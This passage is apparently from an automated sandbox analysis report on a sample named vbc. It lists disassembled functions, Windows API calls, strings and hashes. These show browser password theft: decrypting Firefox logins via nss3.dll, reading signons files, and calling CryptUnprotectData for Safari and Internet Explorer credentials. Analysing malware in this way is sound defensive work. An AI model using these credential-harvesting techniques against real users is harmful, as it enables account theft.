                                                                                                                                                    • Opcode Fuzzy Hash: cc7230da910be55964706480e184fd4a449cc4274279a5797c2cb2fba6568da8
                                                                                                                                                    • Instruction Fuzzy Hash: CEF0BB75901528ABDB206BB4DC8C9ABB7ACEB45765F0401B2ED06E3180D334AE458AD9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D674 Relevance: 4.5, APIs: 3, Instructions: 41fileclipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
                                                                                                                                                      • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
                                                                                                                                                      • Part of subcall function 004074C6: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00407506
                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0040D6B0
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040D6C9
                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D6E8
                                                                                                                                                      • Part of subcall function 00407363: EmptyClipboard.USER32 ref: 0040736D
                                                                                                                                                      • Part of subcall function 00407363: GetFileSize.KERNEL32(00000000,00000000), ref: 0040738A
                                                                                                                                                      • Part of subcall function 00407363: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040739B
                                                                                                                                                      • Part of subcall function 00407363: GlobalLock.KERNEL32 ref: 004073A8
                                                                                                                                                      • Part of subcall function 00407363: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004073BB
                                                                                                                                                      • Part of subcall function 00407363: GlobalUnlock.KERNEL32(00000000), ref: 004073CD
                                                                                                                                                      • Part of subcall function 00407363: SetClipboardData.USER32 ref: 004073D6
                                                                                                                                                      • Part of subcall function 00407363: CloseHandle.KERNEL32(?), ref: 004073EA
                                                                                                                                                      • Part of subcall function 00407363: CloseClipboard.USER32 ref: 004073FE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2633007058-0
                                                                                                                                                    • Opcode ID: 27fa221fbd852bde5ab3e37b7c4579dba1b3dae105a290b2fbc18255b5855c3f
                                                                                                                                                    • Instruction ID: bc74c52ab6c87c34bb6cce86e30c95d4cd513021a264dd7f219e40d67a453ac4
                                                                                                                                                    • Opcode Fuzzy Hash: 27fa221fbd852bde5ab3e37b7c4579dba1b3dae105a290b2fbc18255b5855c3f
                                                                                                                                                    • Instruction Fuzzy Hash: 45F0C831B0030457EB646B71DC4EFAF376DAB40B01F00057AF469A51E2EFBAF9458A59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExW.KERNEL32(00450DA8,0000001A,00412291), ref: 0040768E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Version
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                    • Opcode ID: b36f1e02b416ec865f4d87fb5f88c2c9fdef71dbbf2c75f0f10f81923867f6e4
                                                                                                                                                    • Instruction ID: 443b7a688d421a19dce43b17e8414db768b780ab8005fe7e93b00bb89c3c7b35
                                                                                                                                                    • Opcode Fuzzy Hash: b36f1e02b416ec865f4d87fb5f88c2c9fdef71dbbf2c75f0f10f81923867f6e4
                                                                                                                                                    • Instruction Fuzzy Hash: 76C0803C5002205FD7C04B88BC047C375B85B86727F004073ED40A1251C378680CCF9C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004021D9 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 282COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402201
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402231
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040225E
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040228B
                                                                                                                                                      • Part of subcall function 0040805C: wcslen.MSVCRT ref: 0040806F
                                                                                                                                                      • Part of subcall function 0040805C: memcpy.MSVCRT ref: 0040808E
                                                                                                                                                    • memset.MSVCRT ref: 0040262F
                                                                                                                                                    • memcpy.MSVCRT ref: 00402664
                                                                                                                                                      • Part of subcall function 00403853: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                                                                                                                      • Part of subcall function 00403853: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                                                                                                                      • Part of subcall function 00403853: FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                                                                                                                    • memcpy.MSVCRT ref: 004026C0
                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 0040271E
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 0040272D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
                                                                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                    • API String ID: 462158748-1134094380
                                                                                                                                                    • Opcode ID: 77a1b1b6f1160c8da7bc509bbcfd5bc0ca8aed1e625a5ef69c1f2e6acdd1c49f
                                                                                                                                                    • Instruction ID: cc44404655acc20b5533cc0c34fbbab0c7f11d0fd0cfcd5d05bb593c6a12ed59
                                                                                                                                                    • Opcode Fuzzy Hash: 77a1b1b6f1160c8da7bc509bbcfd5bc0ca8aed1e625a5ef69c1f2e6acdd1c49f
                                                                                                                                                    • Instruction Fuzzy Hash: C9F1FF208087E9C9DB32D7788D097CEBE645B23324F0443D9E1E87A2D2D7B55B85CB66
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409B6A Relevance: 59.8, APIs: 27, Strings: 7, Instructions: 275stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                    • String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
                                                                                                                                                    • API String ID: 2787044678-1843504584
                                                                                                                                                    • Opcode ID: cb6674861b630e023730bc8514c911496a266ea8c7e3a43a84e29182814d6b93
                                                                                                                                                    • Instruction ID: bbe16b9e6473d86cc6eed57c0ed50d6d6787e5e5d2f3b2995f82d19aea11410f
                                                                                                                                                    • Opcode Fuzzy Hash: cb6674861b630e023730bc8514c911496a266ea8c7e3a43a84e29182814d6b93
                                                                                                                                                    • Instruction Fuzzy Hash: 2891A571940209BFEF20EF55CD41EDF77A8AF54314F10006AF848A3292EB79EE508B68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004113F4 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 00411421
                                                                                                                                                    • GetDlgItem.USER32 ref: 0041142D
                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041143C
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00411448
                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00411451
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041145D
                                                                                                                                                    • GetWindowRect.USER32 ref: 0041146F
                                                                                                                                                    • GetWindowRect.USER32 ref: 0041147A
                                                                                                                                                    • MapWindowPoints.USER32 ref: 0041148E
                                                                                                                                                    • MapWindowPoints.USER32 ref: 0041149C
                                                                                                                                                    • GetDC.USER32 ref: 004114D5
                                                                                                                                                    • wcslen.MSVCRT ref: 00411515
                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00411526
                                                                                                                                                    • ReleaseDC.USER32 ref: 00411573
                                                                                                                                                    • _snwprintf.MSVCRT ref: 00411636
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0041164A
                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00411668
                                                                                                                                                    • GetDlgItem.USER32 ref: 0041169E
                                                                                                                                                    • GetWindowRect.USER32 ref: 004116AE
                                                                                                                                                    • MapWindowPoints.USER32 ref: 004116BC
                                                                                                                                                    • GetClientRect.USER32 ref: 004116D3
                                                                                                                                                    • GetWindowRect.USER32 ref: 004116DD
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411723
                                                                                                                                                    • GetClientRect.USER32 ref: 0041172D
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411765
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                                                                    • Opcode ID: 82769fcda4aee539b94f7460eafa85e4f9ca3f83dedf5f01e4882f05d4beebf3
                                                                                                                                                    • Instruction ID: 8ff438caca04d900f401a49fee0f0db12add2221ca5be9c1dac879361ae65e4d
                                                                                                                                                    • Opcode Fuzzy Hash: 82769fcda4aee539b94f7460eafa85e4f9ca3f83dedf5f01e4882f05d4beebf3
                                                                                                                                                    • Instruction Fuzzy Hash: E3B1B071108341AFD720DF68C985E6BBBF9FB88704F004A2DF69692261DB75E944CF16
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040109F Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 182COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                    • String ID: WebBrowserPassView
                                                                                                                                                    • API String ID: 829165378-2171583229
                                                                                                                                                    • Opcode ID: 9528d28c6aa400cf950dedba09aaaf40a629cdba61218975bccd681405960fd9
                                                                                                                                                    • Instruction ID: 8d9c6eba8ddb3a7c26c98eaf12cf57faa7ce2db5dd3d1d54ce32cd9ff2fd20fc
                                                                                                                                                    • Opcode Fuzzy Hash: 9528d28c6aa400cf950dedba09aaaf40a629cdba61218975bccd681405960fd9
                                                                                                                                                    • Instruction Fuzzy Hash: 8C517E35500308BBDB22AF64DC45E6E7BB5FB04742F104A7AF952A66F0C774AE50EB18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F767 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • {Unknown}, xrefs: 0040F831
                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040FA0E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                                                                    • Opcode ID: 4192c38ce99e2e5d3a4b6b431755b06133974f066cfd60dedb09103ebde27fd1
                                                                                                                                                    • Instruction ID: 69e9f0bde0ef3093fe47e3bafb281a214b560c7f74f151c34d98b156b899ddfd
                                                                                                                                                    • Opcode Fuzzy Hash: 4192c38ce99e2e5d3a4b6b431755b06133974f066cfd60dedb09103ebde27fd1
                                                                                                                                                    • Instruction Fuzzy Hash: F7719FB680121DBEEF219B50DC45EDA7B6CEF08355F0000B6F508A21A1DA799E88CF69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040FAFF Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 124libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040FB20
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040FB69
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 0040FB76
                                                                                                                                                    • memset.MSVCRT ref: 0040FB90
                                                                                                                                                    • wcslen.MSVCRT ref: 0040FB9D
                                                                                                                                                    • wcslen.MSVCRT ref: 0040FBAC
                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040FBE7
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC03
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC1A
                                                                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040FC2F
                                                                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040FC3B
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040FC47
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040FC53
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040FC5F
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040FC6B
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040FC77
                                                                                                                                                      • Part of subcall function 0040648C: memset.MSVCRT ref: 004064AD
                                                                                                                                                      • Part of subcall function 0040648C: memset.MSVCRT ref: 004064FA
                                                                                                                                                      • Part of subcall function 0040648C: RegCloseKey.ADVAPI32(0040FB38), ref: 00406634
                                                                                                                                                      • Part of subcall function 0040648C: wcscpy.MSVCRT ref: 00406642
                                                                                                                                                      • Part of subcall function 0040648C: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406659
                                                                                                                                                      • Part of subcall function 0040648C: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406695
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
                                                                                                                                                    • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                    • API String ID: 2554026968-4029219660
                                                                                                                                                    • Opcode ID: 7b5db3b0d5bf1743c32fccddbb21aa02e391161234974de8ca04521cdbb317a2
                                                                                                                                                    • Instruction ID: eeb2f36212a21d3aa086fe7dd3a0485c0e35c5a93e030d286215ed8b11f998db
                                                                                                                                                    • Opcode Fuzzy Hash: 7b5db3b0d5bf1743c32fccddbb21aa02e391161234974de8ca04521cdbb317a2
                                                                                                                                                    • Instruction Fuzzy Hash: 15418371940309ABEB209F61CC85E9AB7F8BF58744F10087EE58593191EBB999848F58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F4F7 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 171COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetwcscpy$wcslen$_snwprintf$wcscat
                                                                                                                                                    • String ID: General$IsRelative$Path$Profile%d$profiles.ini
                                                                                                                                                    • API String ID: 3014334669-2600475665
                                                                                                                                                    • Opcode ID: c5dfa419d5e156fd18e38bb9fe1657a50580db14dfc2297f0345cb0c168ef583
                                                                                                                                                    • Instruction ID: ca42eae1a8a54deb15ae60d9a008fbbac9316f2c57223d03809256618168ca92
                                                                                                                                                    • Opcode Fuzzy Hash: c5dfa419d5e156fd18e38bb9fe1657a50580db14dfc2297f0345cb0c168ef583
                                                                                                                                                    • Instruction Fuzzy Hash: F151627290021CBADB20EB55CD45ECEB7BCAF14744F5044B7B10DA2091EB789B888F6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D1D0 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 254windowregistryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040A2C8: LoadMenuW.USER32 ref: 0040A2D0
                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040D2E0
                                                                                                                                                    • CreateStatusWindowW.COMCTL32(50000000,Function_000434FC,?,00000101), ref: 0040D2FB
                                                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040D313
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D322
                                                                                                                                                    • LoadImageW.USER32 ref: 0040D32F
                                                                                                                                                    • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040D359
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D366
                                                                                                                                                    • CreateWindowExW.USER32 ref: 0040D38D
                                                                                                                                                    • GetFileAttributesW.KERNEL32(004518A8,?,00000000,/nosaveload,00000000,00000001), ref: 0040D468
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,004518A8,?,00000000,/nosaveload,00000000,00000001), ref: 0040D478
                                                                                                                                                    • wcslen.MSVCRT ref: 0040D47F
                                                                                                                                                    • wcslen.MSVCRT ref: 0040D48D
                                                                                                                                                    • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001,?,00000000,/nosaveload,00000000,00000001), ref: 0040D4DA
                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040D515
                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040D528
                                                                                                                                                      • Part of subcall function 00403A14: wcslen.MSVCRT ref: 00403A31
                                                                                                                                                      • Part of subcall function 00403A14: SendMessageW.USER32(?,00001061,?,?), ref: 00403A55
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Send$CreateWindowwcslen$HandleLoadMenuModule$AttributesFileImagePathRegisterStatusTempToolbar
                                                                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                    • API String ID: 1638525581-2103577948
                                                                                                                                                    • Opcode ID: 09239095896d852bc9637f75337da0b8f677ca08e5855ea8ee30249aa1057c49
                                                                                                                                                    • Instruction ID: 7a0d9eec849a31f4480aab016bccc9be6ec6f6c883519ecda8bf5f9757aa8271
                                                                                                                                                    • Opcode Fuzzy Hash: 09239095896d852bc9637f75337da0b8f677ca08e5855ea8ee30249aa1057c49
                                                                                                                                                    • Instruction Fuzzy Hash: D7A1A171500388AFEB11DF68CC89BCA7FA5AF55704F04447DFA486B292C7B59908CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406DD9 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 222COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040FAFF: memset.MSVCRT ref: 0040FB20
                                                                                                                                                      • Part of subcall function 0040FAFF: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040FB69
                                                                                                                                                      • Part of subcall function 0040FAFF: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 0040FB76
                                                                                                                                                      • Part of subcall function 0040FAFF: memset.MSVCRT ref: 0040FB90
                                                                                                                                                      • Part of subcall function 0040FAFF: wcslen.MSVCRT ref: 0040FB9D
                                                                                                                                                      • Part of subcall function 0040FAFF: wcslen.MSVCRT ref: 0040FBAC
                                                                                                                                                      • Part of subcall function 0040FAFF: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040FBE7
                                                                                                                                                      • Part of subcall function 0040FAFF: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC03
                                                                                                                                                      • Part of subcall function 0040FAFF: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC1A
                                                                                                                                                      • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040FC2F
                                                                                                                                                      • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040FC3B
                                                                                                                                                      • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040FC47
                                                                                                                                                      • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040FC53
                                                                                                                                                      • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040FC5F
                                                                                                                                                    • memset.MSVCRT ref: 00406E17
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
                                                                                                                                                    • memset.MSVCRT ref: 00406E69
                                                                                                                                                    • memset.MSVCRT ref: 00406E81
                                                                                                                                                    • memset.MSVCRT ref: 00406E99
                                                                                                                                                    • memset.MSVCRT ref: 00406EB1
                                                                                                                                                    • wcslen.MSVCRT ref: 00406EBC
                                                                                                                                                    • wcslen.MSVCRT ref: 00406ECA
                                                                                                                                                    • wcslen.MSVCRT ref: 00406EF9
                                                                                                                                                    • wcslen.MSVCRT ref: 00406F07
                                                                                                                                                    • wcslen.MSVCRT ref: 00406F36
                                                                                                                                                    • wcslen.MSVCRT ref: 00406F44
                                                                                                                                                    • wcslen.MSVCRT ref: 00406F73
                                                                                                                                                    • wcslen.MSVCRT ref: 00406F81
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00407074
                                                                                                                                                      • Part of subcall function 0040697E: memset.MSVCRT ref: 004069BD
                                                                                                                                                      • Part of subcall function 0040697E: memset.MSVCRT ref: 00406A3C
                                                                                                                                                      • Part of subcall function 0040697E: memset.MSVCRT ref: 00406A51
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetwcslen$AddressProc$CurrentDirectory$LibraryLoad$ByteCharHandleModuleMultiWide
                                                                                                                                                    • String ID: signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                                                                                                                    • API String ID: 1908949080-2435954524
                                                                                                                                                    • Opcode ID: 00d903caa4eb60a1b1d619f3f2ea5d5f954a86edb9cfa0049ad989ed505ac937
                                                                                                                                                    • Instruction ID: 8f96e2222c77d76af5181fd0f533d019f0899d465181413e0b466bd376840954
                                                                                                                                                    • Opcode Fuzzy Hash: 00d903caa4eb60a1b1d619f3f2ea5d5f954a86edb9cfa0049ad989ed505ac937
                                                                                                                                                    • Instruction Fuzzy Hash: 8871B07180461AABDB21EF61DC41A9E77BCFF04318F1004AEF909F2181E779AE548F69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00441C15 Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(0040AAB8,?,00000000), ref: 00441C2B
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00441C46
                                                                                                                                                    • GetFileVersionInfoW.VERSION(0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C56
                                                                                                                                                    • VerQueryValueW.VERSION(00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C69
                                                                                                                                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441CA6
                                                                                                                                                    • _snwprintf.MSVCRT ref: 00441CC6
                                                                                                                                                    • wcscpy.MSVCRT ref: 00441CF0
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00441DA0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
